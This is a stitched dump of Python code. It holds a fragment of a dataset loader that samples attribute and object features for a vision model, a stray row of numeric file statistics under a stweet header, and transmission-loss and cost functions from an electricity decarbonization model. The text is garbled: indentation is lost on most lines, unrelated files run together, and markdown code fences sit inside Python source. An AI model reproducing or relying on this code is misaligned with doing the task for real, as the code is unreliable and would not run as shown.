img_pos_obj[i] = self.activations[img_pos_obj[i]]
if len(img_pos_obj) > 10:
img_pos_obj_feats = random.sample(img_pos_obj, 10)
else:
if len(img_pos_obj) != 0:
img_pos_obj_feats = []
while len(img_pos_obj_feats) < 10:
for i in range(len(img_pos_obj)):
img_pos_obj_feats.append(img_pos_obj[i])
if len(img_pos_obj_feats) == 10:
break
# img_pos_obj_feats = img_pos_obj.repeat(math.ceil(10 / len(img_pos_obj)), 1)[:10]
                else:
                    # No object positives exist: fall back to a zero feature
                    # block of the extractor's feature dimension (the original
                    # len(img_pos_att[0]) measured a file-path string here)
                    img_pos_obj_feats = torch.zeros(10, self.feat_dim)
for i in range(len(img_pos_att)):
img_pos_att[i] = self.activations[img_pos_att[i]]
            if len(img_pos_att) > 10:
                img_pos_att_feats = random.sample(img_pos_att, 10)
            else:
                if len(img_pos_att) != 0:
                    # Cycle through the available attribute positives until 10 are collected
                    img_pos_att_feats = []
                    while len(img_pos_att_feats) < 10:
                        for i in range(len(img_pos_att)):
                            img_pos_att_feats.append(img_pos_att[i])
                            if len(img_pos_att_feats) == 10:
                                break
                else:
                    # No attribute positives exist: fall back to a zero feature block
                    img_pos_att_feats = torch.zeros(10, self.feat_dim)
img_pos_obj_feats = torch.tensor([item.cpu().detach().numpy() for item in img_pos_obj_feats])
img_pos_att_feats = torch.tensor([item.cpu().detach().numpy() for item in img_pos_att_feats])
all_neg_attrs = []
all_neg_objs = []
for curr in range(self.num_negs):
            neg_attr, neg_obj = self.sample_negative(attr, obj)  # negative for triplet loss
all_neg_attrs.append(neg_attr)
all_neg_objs.append(neg_obj)
neg_attr, neg_obj = torch.LongTensor(all_neg_attrs), torch.LongTensor(all_neg_objs)
#note here
if len(self.train_obj_affordance[obj])>1:
inv_attr = self.sample_train_affordance(attr, obj) # attribute for inverse regularizer
else:
inv_attr = (all_neg_attrs[0])
comm_attr = self.sample_affordance(inv_attr, obj) # attribute for commutative regularizer
data += [neg_attr, neg_obj, inv_attr, comm_attr, img_pos_obj_feats, img_pos_att_feats]
# Return image paths if requested as the last element of the list
if self.return_images and self.phase != 'train':
data.append(image)
return data
def __len__(self):
'''
Call for length
'''
return len(self.sample_indices)
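# __getitem__ above pads the positive-feature lists to exactly 10 entries by
# cycling through whatever is available. A hedged, stand-alone sketch of that
# padding step using itertools; the helper name is illustrative and not part of
# this module's API:
def _cycle_pad_sketch(items, k=10):
    # Repeat 'items' in order until exactly k entries are collected;
    # an empty input stays empty (the caller must handle that case).
    from itertools import cycle, islice
    if not items:
        return []
    return list(islice(cycle(items), k))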
# ---- File: stweet/parse/__init__.py ----
| 19 | 37 | 0.868421 | 5 | 38 | 6.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
# ---- File: scripts/md_init_ins.py ----
# General Electricity sector Decarbonization Model (GEDM)
# Copyright (C) 2020 Cheng-Ta Chu.
# Licensed under the MIT License (see LICENSE file).
#
# Module note:
# Functions to initialize instance settings
#
#----------------------------------------------------
# sets
#----------------------------------------------------
def getCountryIndList(objMarket):
""" get country index list in the market """
lsCountryList = list()
for objZone in objMarket.lsZone:
if objZone.iCountryIndex not in lsCountryList:
lsCountryList.append(objZone.iCountryIndex )
return lsCountryList
def getCountryCodeList(objMarket):
""" get country code list in the market """
lsCountryList = list()
for objZone in objMarket.lsZone:
if objZone.sCountry not in lsCountryList:
lsCountryList.append(objZone.sCountry )
return lsCountryList
#----------------------------------------------------
# Fixed Parameters
#----------------------------------------------------
def getZonesInCountry(objMarket, model):
    ''' get the semicolon-joined list of zone IDs in each country '''
dData = {}
for sCountry in model.setCountryCode_CN:
sZoneList = ""
for objZone in objMarket.lsZone:
if objZone.sCountry == sCountry:
sZoneList = sZoneList + objZone.sZoneID + ";"
dData[sCountry] = sZoneList
return dData
##### time slice #####
def getTSRepHourYear(instance, model):
''' get TS representing hours in a year '''
dData = {}
for objTS in instance.lsTimeSlice:
dData[objTS.sTSIndex] = objTS.iRepHoursInYear
return dData
def getTSRepHourDay(instance, model):
''' get TS representing hours in a day '''
dData = {}
for objTS in instance.lsTimeSlice:
dData[objTS.sTSIndex] = objTS.iRepHoursInDay
return dData
def getTSRepHourYear_CE(instance, model):
''' get TS representing hours in a year, for CE model '''
dData = {}
for objTS in instance.lsTimeSlice_CEP:
dData[objTS.sTSIndex] = objTS.iRepHoursInYear
return dData
def getTSRepHourDay_CE(instance, model):
''' get TS representing hours in a day, for CE model '''
dData = {}
for objTS in instance.lsTimeSlice_CEP:
dData[objTS.sTSIndex] = objTS.iRepHoursInDay
return dData
def getTSIndInDay(instance, model):
''' get the set of index of the TS in a day '''
dData = {}
for sDay_DY in model.setDay_DY:
TSIndlist = ""
for objTS in instance.lsTimeSlice:
if (objTS.sMonth + objTS.sDay) == sDay_DY:
TSIndlist = TSIndlist + objTS.sTSIndex + ";"
TSIndlist = TSIndlist[0:-1] # remove the last ";"
dData[sDay_DY] = TSIndlist
return dData
def getTSIndInDay_CE(instance, model):
''' get the set of index of the TS in a day, for CE model '''
dData = {}
for sDay_DY in model.setDay_DY:
TSIndlist = ""
for objTS in instance.lsTimeSlice_CEP:
if (objTS.sMonth + objTS.sDay) == sDay_DY:
TSIndlist = TSIndlist + objTS.sTSIndex + ";"
TSIndlist = TSIndlist[0:-1] # remove the last ";"
dData[sDay_DY] = TSIndlist
return dData
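# Both getTSIndInDay variants above build a day -> "TS1;TS2;..." mapping by
# string concatenation and then trim the trailing ";". A hedged sketch of the
# same grouping over plain (day, ts_index) tuples using str.join; the helper
# name is illustrative and not part of this module's API:
def _group_ts_by_day_sketch(day_ts_pairs):
    # day_ts_pairs: iterable of (day_key, ts_index) tuples, in time-slice order
    grouped = {}
    for day, ts_index in day_ts_pairs:
        grouped.setdefault(day, []).append(ts_index)
    # join avoids the concatenate-then-strip-";" pattern used above
    return {day: ";".join(indices) for day, indices in grouped.items()}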
def getTSRepHourYear_Day(model, objDayTS):
''' get the TS representing hours in a year '''
dData = {}
for objTS in objDayTS.lsDiurnalTS:
dData[objTS.sTSIndex] = objTS.iRepHoursInYear
return dData
def getTSRepHourDay_Day(model, objDayTS):
''' get the TS representing hours in a day '''
dData = {}
for objTS in objDayTS.lsDiurnalTS:
dData[objTS.sTSIndex] = objTS.iRepHoursInDay
return dData
#----------------------------------------------------
# Transmission Parameters
#----------------------------------------------------
def getTransCapacity(model, objMarket, iYear):
''' get transmission capacity of terrestrial links '''
dData = {}
for sTrans in model.setTransLDZ_TRL:
for objTrans in objMarket.lsTrans:
if objTrans.sTransID == sTrans:
if iYear in objTrans.dicTransAccCap_YS:
dData[sTrans] = objTrans.dicTransAccCap_YS[iYear]
else:
dData[sTrans] = 0
break
return dData
def getTransCapacityOffs(model, objMarket, iYear):
    ''' get transmission capacity of offshore links '''
dData = {}
for sTrans in model.setTransOFZ_TRF:
for objTrans in objMarket.lsTrans_off:
if objTrans.sTransID == sTrans:
if iYear in objTrans.dicTransAccCap_YS:
dData[sTrans] = objTrans.dicTransAccCap_YS[iYear]
else:
dData[sTrans] = 0
break
return dData
def getTransLoss(model, objMarket, ind_year):
''' get transmission loss of terrestrial links '''
dData = {}
for sTrans in model.setTransLDZ_TRL:
for objTrans in objMarket.lsTrans:
if objTrans.sTransID == sTrans:
if objTrans.fDistance > 600:
# HVDC 600km as break point
dData[sTrans] = (objTrans.fDistance / 1000 * objMarket.lsDCLineLoss[ind_year] / 100) \
+ (objMarket.lsDCConvLoss[ind_year] / 100)
else:
# line loss of HVAC lines
dData[sTrans] = objTrans.fDistance / 1000 * objMarket.lsACLineLoss[ind_year] / 100
break
return dData
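# ------------------------------------------------------------------
# Illustrative sketch (not part of the model): getTransLoss applies two
# loss models depending on line length. Distances are in km, line
# losses in % per 1000 km, converter loss in % per converter pair; the
# numeric values below are assumptions for illustration only.
# ------------------------------------------------------------------

```python
def trans_loss(fDistance, fACLossPct, fDCLossPct, fDCConvLossPct):
    """Fractional transmission loss, mirroring getTransLoss's branch logic."""
    if fDistance > 600:
        # HVDC beyond the 600 km break point:
        # distance-dependent line loss plus fixed converter loss
        return (fDistance / 1000 * fDCLossPct / 100) + (fDCConvLossPct / 100)
    # HVAC below the break point: distance-dependent line loss only
    return fDistance / 1000 * fACLossPct / 100

# illustrative values: 7 %/1000 km AC, 3.5 %/1000 km DC, 1.4 % converter loss
print(trans_loss(500, 7.0, 3.5, 1.4))   # 0.035 -> 3.5 % over 500 km of HVAC
print(trans_loss(1000, 7.0, 3.5, 1.4))  # 0.049 -> HVDC line + converter loss
```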
def getTransLossOffs(model, objMarket, ind_year):
''' get transmission loss of offshore links '''
dData = {}
for sTrans in model.setTransOFZ_TRF:
for objTrans in objMarket.lsTrans_off:
if objTrans.sTransID == sTrans:
                # assume all offshore links are HVDC (line loss plus converter loss)
dData[sTrans] = (objTrans.fDistance / 1000 * objMarket.lsDCLineLoss[ind_year] / 100) \
+ (objMarket.lsDCConvLoss[ind_year] / 100)
break
return dData
def getTransCost(model, objMarket, ind_year):
''' get transmission cost of terrestrial links '''
##### cost assumptions #####
HVAC_CAPEX = objMarket.lsACCapex[ind_year] # USD per kW km
HVAC_OPEX = objMarket.lsACOpex[ind_year] # USD per kW km
HVDC_CAPEX = objMarket.lsDCCapex[ind_year] # USD per kW km
HVDC_OPEX = objMarket.lsDCOpex[ind_year] # USD per kW km
HVDC_CAPEX_converter = objMarket.lsDCCapexConv[ind_year] # USD per kW
HVDC_OPEX_converter = objMarket.lsDCOpexConv[ind_year] # USD per kW
CRF = objMarket.lsCRF[ind_year] / 100 # lifetime 50 years, discount rate 5%
dData = {}
for sTrans in model.setTransLDZ_TRL:
for objTrans in objMarket.lsTrans:
if objTrans.sTransID == sTrans:
distance = objTrans.fDistance
if distance > 0:
CostPerMW = 0
if distance > 600: # HVDC 600km as break point
# annual cost per MW
CostPerMW = distance * (HVDC_CAPEX*CRF + HVDC_OPEX) * 1000
# converter cost per MW
CostPerMW = CostPerMW + ( (HVDC_CAPEX_converter*CRF + HVDC_OPEX_converter) * 1000 )
# change unit from USD per MW to M.USD per MW
CostPerMW = CostPerMW / 1000000
else: # HVAC
# annual cost per MW
CostPerMW = distance * (HVAC_CAPEX*CRF + HVAC_OPEX) * 1000
# change unit from USD per MW to M.USD per MW
CostPerMW = CostPerMW / 1000000
dData[sTrans] = CostPerMW
                    else:
                        # zero-distance link: assign a prohibitive sentinel cost
                        dData[sTrans] = 9999
break
return dData
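# ------------------------------------------------------------------
# Illustrative sketch (not part of the model): getTransCost annualizes
# the link cost as distance * (CAPEX*CRF + OPEX) * 1000, adds the
# converter term for HVDC, and divides by 1e6 to convert USD/MW into
# M.USD/MW. The unit-cost figures below are placeholders, not the
# model's data.
# ------------------------------------------------------------------

```python
def trans_cost_musd_per_mw(distance_km, capex_usd_kw_km, opex_usd_kw_km,
                           crf, conv_capex_usd_kw=0.0, conv_opex_usd_kw=0.0):
    """Annualized link cost in M.USD per MW, mirroring getTransCost."""
    # line cost: USD per kW km -> USD per MW via the factor 1000
    cost = distance_km * (capex_usd_kw_km * crf + opex_usd_kw_km) * 1000
    # converter stations (HVDC only): USD per kW -> USD per MW
    cost += (conv_capex_usd_kw * crf + conv_opex_usd_kw) * 1000
    return cost / 1e6  # USD per MW -> M.USD per MW

# illustrative: 800 km HVDC line, CAPEX 0.5 USD/kW km, OPEX 0.005 USD/kW km,
# CRF 5.48 %, converter CAPEX 100 USD/kW, converter OPEX 1 USD/kW
print(trans_cost_musd_per_mw(800, 0.5, 0.005, 0.0548, 100.0, 1.0))  # 0.0324
```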
def getTransCostOffs(model, objMarket, ind_year):
''' get transmission cost of offshore links '''
##### cost assumptions #####
HVDC_CAPEX = objMarket.lsDCCapex[ind_year] # USD per kW km
HVDC_OPEX = objMarket.lsDCOpex[ind_year] # USD per kW km
HVDC_CAPEX_converter = objMarket.lsDCCapexConv[ind_year] # USD per kW
HVDC_OPEX_converter = objMarket.lsDCOpexConv[ind_year] # USD per kW
CRF = objMarket.lsCRF[ind_year] / 100 # lifetime 50 years, discount rate 5%
dData = {}
for sTrans in model.setTransOFZ_TRF:
for objTrans in objMarket.lsTrans_off:
if objTrans.sTransID == sTrans:
distance = objTrans.fDistance
if distance > 0:
CostPerMW = 0
# annual cost per MW
CostPerMW = distance * (HVDC_CAPEX*CRF + HVDC_OPEX) * 1000
# converter cost per MW
CostPerMW = CostPerMW + ( (HVDC_CAPEX_converter*CRF + HVDC_OPEX_converter) * 1000 )
# change unit from USD per MW to M.USD per MW
CostPerMW = CostPerMW / 1000000
dData[sTrans] = CostPerMW
                    else:
                        # zero-distance link: assign a prohibitive sentinel cost
                        dData[sTrans] = 9999
break
return dData
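# ------------------------------------------------------------------
# Illustrative sketch (not part of the model): the CRF comments above
# ("lifetime 50 years, discount rate 5%") refer to the standard capital
# recovery factor, CRF = r(1+r)^n / ((1+r)^n - 1). The model reads CRF
# from objMarket.lsCRF; this only shows how such a value is derived.
# ------------------------------------------------------------------

```python
def capital_recovery_factor(rate, lifetime_years):
    """Annuity factor that spreads CAPEX evenly over the asset lifetime."""
    f = (1 + rate) ** lifetime_years
    return rate * f / (f - 1)

# 5 % discount rate over a 50-year transmission-line lifetime
print(round(capital_recovery_factor(0.05, 50), 4))  # 0.0548
```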